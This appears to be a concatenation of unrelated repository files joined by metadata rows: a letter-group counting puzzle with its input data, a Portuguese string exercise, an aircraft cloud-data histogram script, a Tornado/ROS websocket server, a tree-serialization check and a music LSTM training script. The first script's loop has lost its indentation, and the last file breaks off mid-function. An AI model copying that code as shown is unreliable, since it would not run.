qzrludbmenpoychtxsv
breuhyzmqwxnovpd
qnpobxrgvzmehjdyu
yzqvxdokmaueirhnbp
slrojqcvy
syvrcoqjl
oekrcjslvqy
cjorvslyq
ieb
edbi
ibxe
ljpvngtimfceb
ubdaiopgrqlxekyf
fxladregykpobiqu
ogdyxiaubrqkelpsf
dterlayxgbfqipkuo
akqpxdleiyforbgu
wtolyupagvsi
gvpioswtauy
mwgckfxlrseyv
xwmklvfzseogyc
xdsfhlgwtcknemyv
yncfxwsvmekgl
iozr
msaqc
nvjdcxs
jyralpdhevs
zytrwavujnpgsedh
ujwpohtlsaeikgn
xeqpvmzkonauswcgjhi
wesnkpgioufjah
xhmquay
ibwzste
fwdb
gmolphac
achpmql
lmacp
plcmtav
frlvut
kiewoghxnczs
gqackoyhextlb
aybocxkqtegh
waxltoybhceqkg
hrkgxapityqebvmoc
xlbngteqcyohka
nijvfszwupdxtklbq
uativywzlbpkxndfqj
lrinjwkaxdvfbuqtpz
tkgenjbfviwxdocuqzmpl
flnpjidyzbtwsxqvuk
m
n
mq
h
m
kxmjusioqeglt
vdnjboreftphwgacy
dqyr
jkwro
kri
or
bwjflmnzer
jnegwb
ebphjacsounwv
mozfbwstjypiahuek
nuawhmklyvoejqgdfs
csfuwkyhjmoea
kgwamofsejyhu
zgv
vrzg
zb
b
b
wroqfnxtvmzlcjhkigpy
phislkyrvfczmtqngowx
rgimcptvlzfoxqhwnky
ycoxklznupsvwfqmrihgt
ugtkiavlzmbcjdwh
mawhcdnujskgzvli
evwaqpyiockmuzgjdrh
njqkoue
hmlwp
rmvqfznjd
kjvrdzqfnumc
mzjqdvrftn
dznrjvcqfm
afmsutzkbcphynlvx
zdbnmhairpjvtlyux
sqoltmkryjv
wkmfgjyvhuslzq
vrsybmqljk
vklqmryjs
bjqsxpkvmly
kdxc
xkdlc
cdkxf
kcdx
lscpxrwvjmdfukhnyao
srkuvodlahpfyqmxjncw
ahmldxfkoysrjcpuvwn
ospdwcnjfhyrkmlavxu
aojpyrkwdxnflmuchvs
nruxazdsbpivjcyhmo
pcjinbmuzadohgxyvsr
pczehkynmvlgoasq
gsuvonpkymaqeh
jpvmqhuoesgakyn
epqoksgmhayvrn
uzadcejqiymbhvn
wyazmqevuihdjbfc
bmhnyjcvzaqideu
jymhvbqtopelcuzadi
oplus
pusl
rzpslnux
lwpsu
hjslpu
ftdpru
ocpfntdwgu
jicg
botnkcgemqaldpijrfv
jcihg
ijcug
gcji
gwjrpk
mtadxzyfoqevsnbl
uigkphc
cdwlsgohm
djk
qrdbzfteina
dco
xdyu
gwfvicuz
cwzgfuqi
zcwgfuqi
iwgcfuz
wzgciuf
tkfpjzyenihv
epkvjithfc
tljhiekvfp
vcikptejhlf
sujcyqxo
mdjnewvfptlzk
vfkndpmlzejtw
zjvewmfnpdtkl
nyflwevxom
jehzdrvoyfbtqs
ytbedfgancms
tgsdbymafenc
ymtbnecfdsga
efnytdabgcms
ebloc
beo
ebo
boe
lnvoewrfzi
mwehcfpinrkx
dsfawiurnge
ewqcrnfjxip
twbqs
ybhifuwjgx
fagriw
qtwd
pzkewvlnmo
ntfmixybewk
chkfqnutybz
rmyxsoltfhzjcunwkgepdiaqvb
ywnzlpvbaxqirktcsdhmjeufog
vyxdtz
mjqgwplrs
pujbn
hrulo
wpkr
aoulbqcjef
ydqxzwrmgcols
pjtbvklcoq
lhqnocite
zfxhp
zdxboe
wzqx
twdqyomarski
rktioayj
rkyqaiodgmt
yoicntabkrxzehf
tkaloryiu
ghxi
zkh
hieyqmtxwgl
vnmielcqy
uhrzob
cubho
asjfntubepq
hioubg
kpxcjbywfdqsa
bwldycjpkxafsq
xqkapcwybjsdf
kcj
jvdk
jcmkd
ktbj
xjeckz
krwuosxgcp
rxcwoupgk
gpeocfxrlwuk
xuocphrgkw
jnlwcdyhzepv
rthxfcjmlspqobzn
egrjhuskvxzmiabt
igzvujmxhasrkbet
avubzktghijrsmex
abizvetgxukhjrms
zfiw
hc
hl
nl
oqknymrdihjcseba
ncxmsaqbohejdyr
oeahgbscqmjnrdy
dycjqhbaomensr
rpbonjmaqydcshe
p
py
p
cyqjsari
cqspedy
cuspyq
sqceuyd
k
kb
qk
whejxikaybvrdcq
rdihyakqvwbjce
eivyrdcsqjbmkahw
qihackrwybjdve
jznsueg
fdkrnypzoig
ibnloptgz
kruvzocmatj
kvtzjucwm
ytgjidcpvulxmzk
cvukhtjrbqzwame
tvuwbnmzkcjrsh
j
o
yxagcowndvtpjrkqzfi
qcarjtovwypkgidxfzn
rfpwykaxcqnvtoizjdg
ayfzntcqiowrjpdxkvg
hwmpvgjrkliqyozubnxtf
uktnfhcyxlvgrjqmbzs
huxgbfrmzyqtklavjn
qbnhmagjxyrtczusikpfvlo
xtrmcugjfpzhblqinvoyks
hmyzknpjtcrqfsubxlvgoi
wqm
fzenkoua
yqt
liydh
jlcvyg
rhjtaempquozksbyvnfwdxic
unbaykrcvzohtswexqjdf
cjrkutbedazoqvhywsfnx
kucftryxodqanvjbhwsez
kosunjblazirvfehp
wiqhcbnoptxfkzavuey
fhgkeisnalvopzrbu
u
u
u
bquzfcipegxsntovar
osvxpeqfnbrzicutga
txneuqbvgpcisfzor
kgpwbeqoutzslrvncifx
qiectvrzopxbgsufn
gxzmqchdnivs
avhklufnxrmy
ogziculqfebm
befcmalquvh
aequnfvbcml
ywpbkxedzmrhsg
lrzmkpsuxyej
krxysemzpf
ekpzysuxrm
dvfnrmbqykpozciuxagelsjh
psumybrvcqdnhkaflioxjgez
jgkmsviadexy
aczkmjyxhips
wkyxabosimjn
iekgnp
jqhsnmdrupix
cfliapw
pyvizhg
rzxnpkamhyst
fkhtlvomwznyg
tdvujrfolsnqpia
jalidfvorpsqtun
rdfojtqiluansp
rjtuipsnoahfldq
nyfiadlqwcjkrtpobsmu
qjktphlif
iepygaqktlf
qfkpidlt
yhcgpfevjualt
cafvjthpeylg
lcpefvtgahyj
klswmayo
mdlpekoywxu
klwyoam
bwlmoyak
okmwily
stgzrq
gqtszr
grqszt
stgrqz
t
t
t
gv
y
jhxo
vjmozikwxpran
nivcrdzwokjae
wazfivnrejko
azxhbdvkjygfirsnloq
fbdaiqwykrghvszujnlxo
nihqgvrjfsblxdozkya
buxsrykzw
yzkrtwxbs
xzrykmsvbwfh
skxybwrz
qnj
n
n
tvejbm
mvjbte
tejvbm
mbejtv
jbuvetam
figqoerjmdcyzbhktv
ngetcmforjdxzvqikbh
sydujtzqwcghorepfbxk
vyzbslpdxhuqjfocenmkg
kolvxqsynhiwzca
gzeuxktnavrqcoislhwy
aybxskqmcvldhpjnfziwo
oxvc
ox
yfdo
elsy
syl
syl
ysl
w
w
w
w
w
ogursc
rcogqs
jh
jxehk
ghujy
zqwjh
jhm
sxbqrhwiag
eaqrbhftivcuwxyg
vu
b
z
aqbmdrlg
rneqdmalf
irfdmqebla
srmhqlaokd
iyhpnoe
yohnipred
inohepy
yhipeon
itdsohyjaxqmbpfvekn
zundqjexhiyolfabpmvk
bnvimhpfawyedkqojx
eczua
eaucz
ebaucz
ezauc
qbwaslyjgu
ljuyqzbgsia
buqjlsg
umglqcbjs
bhnfseujqlg
bqofjigeahsumyx
rxzpwuhfcabvnled
sknoyvjtuehwqblxmdza
bfjhrdwcaeonklpvqugmyt
joqegwhlvmit
esnvrgltxqdij
bhlqi
hb
dyfhxgbvp
bh
l
l
xrs
drlzkesu
olfgitqwh
dregsvkpwxay
bkyduamsixp
kslmxdpqayf
uesngibrkydpwv
dbsvugprniky
nbexgp
exwpnb
bxnpeg
bnxupez
rpviaunzhewtyxkgoqbj
heyrovwqixupkgjbnatz
rvqgwebatikzuonypjhx
iwvbqjngeykrzapotxuh
koqnvjzeyptbgiwrauxh
jdw
wenj
skfyquivmgjhalcwzb
hmvawsueklfqpozniy
zhlmnoygesuakqpivw
viqmunszaphklexywo
mkayohvqxnpleuzwis
ihnmpequvkszawloy
dzlviyskfoxeqn
cspaigujmnhdwb
pty
yp
yp
ybp
ybp
rj
rj
kzphsgyu
pszhgkyu
sgkuyhzp
pskzughy
akqvneflpdmjuz
maujklznvqfe
knazfuemvqgljc
flav
vkxrlcf
fo
rg
seagph
gw
logtwpkdjehzqbfaucrn
ujekaqnfbhcrltwogzpd
ofprtcvawjlbeudgnkzqh
dgwnoutzjlhbpckarefq
rlupwtdbaegqzcjknfoh
yifavpnc
stkrd
rwdex
xgwjvybumqocikz
jowivhfslc
nvwoarjci
ojivnhsacw
lwyhzkiuem
euzhmnvfliy
xeoajwlycvnprd
rynvwehzcogutjpdax
efinpwyjdvoracx
x
gux
x
ax
ygoviptclrsnahw
tbzskmxufeqld
lsa
lja
p
z
r
z
kgvriwzjadluhstpm
gukzqdjwpnirhmlbcsfao
ldwrajs
asjrldw
xawcnhkidgtrzyfsqeopu
ahtvofclrqmgnpud
hpnxugjifey
mxeltkycuhag
ubhrzxgyod
ny
dfkjrpoxzy
bliyhtmw
yg
may
a
h
vmjuwdyqstaohxricgnpbfkz
whbgascpeuvoityqnzmkfxrljd
soxhwnuzibdrckpfjgymtqva
dwkztnbocgyjqimhpsaxufrv
szcxpmibqyajwotfurvhkdgn
ncj
jn
jn
nj
nj
jmksvqnybwchitlx
hvmkbyixzclqwtnjsp
icmytjxhlwpnvqksb
hsbwkqyrtilcjmdnaxov
nqhviwjysulkxcgbtm
hevkuqgxdr
sajqfty
ngziqckmx
wogycuq
guwqoyc
wucqgoy
ucoqwgy
ougqydcw
hfjbcmeky
rmxnjofyb
gdvlyuzpbmqj
fmdqswle
lmebuyfostwd
tmdqeyswluf
fqmesudwl
wnrpmdclifezjs
xkghnzwpfesty
ejwxtosypngzkfh
xdgrsetaznhkylfpw
hfvskxtgonpzyew
etnaiwcogmxryljzpvuskdf
icoxtnupdwmsfglrjeaz
jgomncpxdfeubzlratwis
wsdomrcxezpuangfljti
vwxlezg
vwzxeg
zvexgwa
vgwzhex
pase
pfebz
evwpi
epsf
pe
qaorjipshwtbmyz
zuqynhfgcsxramkd
wyxrqz
sjirb
vr
jekdnziasqgfxvphbc
ilghjvcezsqmafkbn
ojkihsdgbzrexmnwlpq
wrjozskgehqpilbmdnx
znsqwmbohridpkgeljx
yzihvsrgx
lmvyrgxb
xcvrnmueylfkg
mxs
gcr
mix
us
bqflzknjtv
f
f
f
wogldbvj
mugjldx
xjdlg
jgsdnl
atkl
tkabcz
yldakb
atk
apvomkg
wxhloqejbgty
gmoyexqjbtwk
nrsyeuibfzqogvaxp
unm
nu
un
eun
uixqnvo
wmlpqcjv
szmrfex
shaouxm
qhyolkraitwf
aytiqohvjw
awqxuhyoit
mdivcj
ixmjdv
imdvj
owcpev
toizevcpw
traiwckoughzs
wrshgqkucioatz
whszcautokrgi
usizrwhacogkt
kzjy
yikgzeh
ykzq
kdzyop
doiu
hiousq
vegibuo
inmazxpoujtw
furbqkplwoncigmd
dulmpbrgqicofkw
orcqtaimhpguldkbwf
kwpsqbemljdcifgoru
qmfkulpoiwdbcrg
zjsuqchlyvgf
dztuaqwsvyk
tdqloumshziryfn
hluniyrfmzqjods
syonlqfdrzuihm
holysqmnifrutdz
znfudymoqlhirpcs
vgydrpsqc
qyicrsvzpgo
crvpsqguy
qafvh
qfhyav
faqhvc
qfvahy
vfqah
iy
siy
vwzk
zwvk
kvwnz
lahzdvmwk
vyxn
yn
dypnq
oinrys
yjn
zsfmbtuxew
uzbxtswfem
mtfxeuzwbs
fxezutmbysw
bskmqxyjgirztlwpaedcouhf
eiaughtyzdqsxoclpmkbwjfr
qfrcypouztmsjagibhwlkexd
ojhuykgawmbdlricpsztefxq
ihokalnevpsjgz
gzkhijespona
kjohgnesipaz
zgjhkneaoibsp
guhosr
rgoash
sry
dirctmsz
osr
cpzrqsbvu
bfcl
vsbadzcpeqoutyn
cyfzdqeorpnas
dhasgzeocynqp
chqepsxozandjwy
wd
dwu
dw
zcldswqk
axgunp
fthovyjimreb
kc
cky
kdc
zckybmorwuse
ymorbcekvlszw
ebyszcmrqkwo
yzsmeorkbwqc
fbosnwxlhtmvcupy
ysgcmuixlpovhfbw
vopfmhyusxwlrcb
fxulogwptvmhcsby
bypcxhmowslqufvn
gvbfisnt
watfgbvi
fibvg
mbcrvoyfgij
mzn
emxc
hborqpj
lkxipeb
rqwfkonvzac
vfmlncguqe
nflmvqiceug
legqnvfmuic
vlnucoegmfq
ubprjdnyateshimflwzkc
ucrfwjkilnmpstyzbhade
umbdizaewlsjhtynfpkcr
cnvmso
hvt
jadtmfzbcsr
rsimbnctzaodfl
mzqdscbwrfat
eaw
vewa
aew
geilhxoqvbujr
qiuvelgrjobxh
xlbirohejgqvu
knudqfalrwt
gswapxdyoqflth
teom
dmteo
temo
eotm
mteo
jalnoyhgstp
ojangphiystlq
nolapjtyghs
gcpwyotlnajsh
gtybajhlqpnso
anjvewuhxfki
otpqhwycvlrxdeja
wzhxveaj
jvewhaxkfn
gazhwbemvfxj
fnouedx
foxndeuh
xofunde
vgkrxoezlbcymsiwhqn
txeowmjvlbhyic
ymvlhbceixupawo
vqugltmfiwxaobhcersky
ywvexqigkblzrmatofscu
drumgbei
vdipsfwnujqglzatky
deigu
xhucordgbi
uqmrdlhbkjpexgtnwvoiy
qkhltvgwenmbuxyijrp
bhtygxiwnklfejuqvmpr
wypljgnehmquitvrbkx
rmnxghvujzkcf
zlwextoqnyji
lixsebojpdnz
pslqajezynbx
bx
kbexu
m
t
taxk
tx
pxft
xt
qctvexujkgzsy
zlkycvfuqxowe
ohq
hlgq
phib
lnzuywcit
uytbilwn
iylhnefrtwg
dtsxzhcq
thcszdq
hctzsidq
vc
cmr
kalcozstu
pgwxmbj
wgpj
ngcftamyqlzexb
vbmxaftcn
afvmbnxptc
xskzlaqc
laxgqsczk
zxqkslac
ghlkczsxaq
wkscpazeytolxq
cgpevkzi
igvtezpkq
vgckizep
sdugxecjhniat
unagscidhtjxe
dcneasigtkjzxuhm
vnqf
dhg
y
kopazxjbeuicstw
rnhjmcdsio
hatrkdnbwicso
dhacjnorsi
isodhrngcet
qshvfdilncor
a
ea
aux
vgdaqruzjiemskln
njmyefvguzlikaqs
vankiqgljcsemuzt
kmevqgszinapjul
nlvumkehbjzgioaqs
yztl
gzyl
vorqly
madgj
mjgdwua
jmgad
gmjda
fukp
ojqxyn
bkr
rmsp"""
all_groups = []
current_group = set()
all_groups.append(current_group)
for line in data.split("\n"):
line = line.strip()
if line == "":
current_group = set()
all_groups.append(current_group)
else:
current_group.update(line)
s =0
for g in all_groups:
s+=len(g)
print(s)
| [
"charlch@users.noreply.github.com"
] | charlch@users.noreply.github.com |
29156ba1d65e04552c8a58d16cf74743e89ed231 | f820d23a92ea5050b9bd6d9eff346532bf64a950 | /cucumber.py | 5b8360d11e34242043045d1d1722155d084ada17 | [] | no_license | aidardarmesh/behave | af84cb42c6e7fa3b1b45ff1ed424341dba1aec62 | 64aa16af5ee8c0b8b68ce56fad6237abe81551ec | refs/heads/master | 2022-11-30T16:15:54.914006 | 2020-08-12T17:35:33 | 2020-08-12T17:35:33 | 287,071,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | class Basket:
def __init__(self, initial_weight):
self.weight = initial_weight
| [
"darmesh.aidar@gmail.com"
] | darmesh.aidar@gmail.com |
44aad35f7613823b2d12a50659cae6c14f302f18 | fb227f203e2f330acc08d06345b2e7acef9c885e | /Exercícios/ex022.py | b9150d254bd182603a5bde67515f4d6725dd17aa | [] | no_license | adannogueira/Curso-Python | aa27718835bb53b78f16c8e7b2e6528cdf64d3c0 | 59cb1a3914cd4f8e011379a1c653da5b0caed7c6 | refs/heads/main | 2023-08-15T02:08:21.988587 | 2021-10-01T14:57:08 | 2021-10-01T14:57:08 | 412,474,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | # Crie um programa que leia o nome completo de uma pessoa e mostre:
# O nome com todas as letras em maiúsculas
# O nome com todas minúsculas
# Quantas letras no total (sem considerar espaços)
# Quantas letras tem o primeiro nome
nome = str(input('Digite seu nome completo: ')).strip()
espaco = nome.count(' ')
primeiro = len(nome.split()[0])
print(f'Nome em maiúsculas: {nome.upper()}')
print(f'Nome em minúsculas: {nome.lower()}')
print(f'Seu nome tem {len(nome) - espaco} letras.')
print(f'Seu primeiro nome tem {primeiro} letras.')
| [
"adan.nogueira@gmail.com"
] | adan.nogueira@gmail.com |
ee0bc5029cbb3d92a0311e726a37acbb4ac87617 | 6601acd5ba7aaaa11f8620df9509e951574373b4 | /aircraft_comparisons/make_1D_histograms.py | bbdbf982f6c812b8a0ea1ad7599d3578d647ec37 | [] | no_license | rachawker/Hawker_ACP_2021-UM_CASIM_paper | 852d07519e4c15791e38bdf8ba7ae4ee9ac3707c | ff3cdd0b1ff72b0fed477824679ab7da49976aa3 | refs/heads/main | 2023-04-07T20:23:16.738292 | 2021-04-22T13:07:22 | 2021-04-22T13:14:40 | 360,516,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,512 | py |
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
| [
"rhawker@sci2.jasmin.ac.uk"
] | rhawker@sci2.jasmin.ac.uk |
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8 | 2612f762ec75a0723a4d12ae1d63a30792e4c236 | /src/websocket_server/src/ws_ros.py~ | f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3 | [] | no_license | aransena/catkin_ws | efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628 | eae6b83c80803a718a8e41569d3b4e7c1c838926 | refs/heads/master | 2021-01-18T21:12:48.557260 | 2016-06-03T13:39:22 | 2016-06-03T13:39:22 | 52,208,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | #!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
| [
"aransena@gmail.com"
] | aransena@gmail.com | |
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1 | dea48ecac82d241e7960f52794eb8a29e5d2e428 | /jianzhioffer/二叉树/字符串验证是否树的前序遍历.py | 0947369b674e63e6e19fb50a48bf9bcedce51ce0 | [] | no_license | yxx94/2020- | e2302bed32c5d7d1e8b559ef378fc60408687934 | e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c | refs/heads/master | 2020-09-03T09:04:08.795099 | 2019-09-19T08:12:51 | 2019-09-19T08:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # coding=utf-8
# 字符串验证是否树的前序遍历
'''
//遍历一边str[]
//如果不是"#"就会多出一个叶子结点,如果是"#"就会减少一个叶子结点
输入: "9,3,4,#,#,1,#,#,2,#,6,#,#"
输出: true
'''
class Solution(object):
def isValidSerialization(self, preorder):
res = 1 # 叶节点的个数
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
| [
"jiachen0212@163.com"
] | jiachen0212@163.com |
35b597f1aba066dbf2b4c96670ca7a2b6fea0c31 | 6d06b9368850aa7df559146498f2376ca24a33df | /other_code/train2.py | ec8c79368c6584e5b699e7147cbba9dc75437dd4 | [] | no_license | manosplitsis/MusicRep | a515d501bd6fa7e53409b3c272b260d646f88c14 | 859df02a304caf2b35688a7c676108602623eb28 | refs/heads/master | 2022-12-25T10:10:04.941114 | 2020-10-03T00:03:49 | 2020-10-03T00:03:49 | 284,100,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,139 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 20 15:43:37 2020
@author: incog
"""
import tensorflow as tf
import tensorflow.keras.backend as K
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential,Model,load_model
from tensorflow.keras.layers import Input, Dense, Dropout, LSTM, Activation, Bidirectional, Flatten, AdditiveAttention,TimeDistributed
from tensorflow.keras import utils
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LambdaCallback
from tensorflow.keras.utils import Sequence
from tensorflow.keras.mixed_precision import experimental as mixed_precision
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
from music21 import *
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
import datetime
import pytz
from IPython.display import clear_output, Audio
from collections import Counter
import glob
import pickle
from util import midi_to_onehot_dict, midi_to_onehot, set_callbacks, keep_dataset_notes, preprocess, glue_notes, add_piece_start_stop,load_doc
from model import create_simple_network_func, build_model,build_model2
from extract_notes import get_notes_midi1,get_notes_midi2,get_notes_midi5,get_notes_event1
def get_samples(notes,seq_length=64):
samples=[]
try:
notes[0][0]==0
except IndexError:
notes=[notes]
for piece in notes:
piece_length=piece.shape[0]
x=[]
if piece_length<=seq_length:
print('smol')
continue
for i in range(0, piece_length - seq_length, 1):
sequence_in = piece[i:i + seq_length+1]
#sequence_out = piece[i + seq_length]
x.append(np.array(sequence_in,dtype='int16'))
samples.append(np.array(x))
return np.array(samples)
def get_fsamples(notes,seq_length=64):
samples=[]
try:
notes[0][0]==0
except IndexError:
notes=[notes]
for piece in notes:
piece_length=len(piece)
x=[]
if piece_length<=seq_length:
continue
for i in range(0, piece_length - seq_length, 1):
sequence_in = piece[i:i + seq_length+1]
#sequence_out = piece[i + seq_length]
samples.append(np.array(sequence_in,dtype='int16'))
print('nb sequences:', len(samples))
return np.array(samples)
def samples_to_batches(samples,batch_size):
batches=[]
batch=[]
count=0
for sample in samples:
batch.append(sample)
count+=1
if count>=batch_size:
count=0
batches.append(np.array(batch))
batch=[]
return np.array(batches)
def samples_to_batches2(samples,batch_size):
batches=[]
batch=[]
count=0
for index,sample in enumerate(samples):
batch.append(index)
count+=1
if count>=batch_size:
count=0
batches.append(np.array(batch))
batch=[]
return np.array(batches)
def get_samples_text(text,seq_length,step=1):
sentences = []
#next_chars = []
for i in range(0, len(text) - seq_length, step):
sentences.append(text[i: i + seq_length+1])
#next_chars.append(text[i + seq_length])
print('nb sequences:', len(sentences))
return sentences
def get_samples_text_tokens(text,seq_length,step=1):
sentences = []
#next_chars = []
for i in range(0, len(text) - seq_length, step):
sentences.append(text[i: i + seq_length+1])
#next_chars.append(text[i + seq_length])
print('nb sequences:', len(sentences))
return sentences
class Data_Gen_Midi(Sequence):
def __init__(self,notes, batch_size=64,seq_length=64, to_fit=True,shuffle=True, one_hot=True,dict=True,n_vocab=130):
#self.list_IDs = sorted(glob.glob(f"{batch_folder}/**/*.krn"))
self.samples=get_fsamples(notes,seq_length=seq_length)
#self.batches=samples_to_batches(self.samples,batch_size)
self.batch_size = batch_size
self.seq_length=seq_length
self.shuffle=shuffle
self.to_fit=to_fit
self.one_hot=one_hot
self.dict=dict
self.dictionary=keep_dataset_notes(notes)
self.n_vocab=n_vocab
def __len__(self):
# print(self.type + ' - len : ' + str(int(np.ceil(self.x.shape[0] / self.batch_size))))
return int(len(self.samples)/self.batch_size)
def __getitem__(self, idx):
batch=self.samples[self.batch_size*idx:self.batch_size*(idx+1)]
#batch=self.batches[idx]
batch_x_midi =np.array([batch[i][0:self.seq_length] for i in range(self.batch_size)])
batch_y_midi =np.array([batch[i][self.seq_length] for i in range(self.batch_size)])
if self.one_hot:
batch_x=[]
batch_y=[]
if self.dict:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot_dict(seq,self.dictionary))
batch_y=midi_to_onehot_dict(batch_y_midi,self.dictionary)
else:
for seq in batch_x_midi:
batch_x.append(midi_to_onehot(seq,dim=self.n_vocab))
batch_y=midi_to_onehot(batch_y_midi,dim=self.n_vocab)
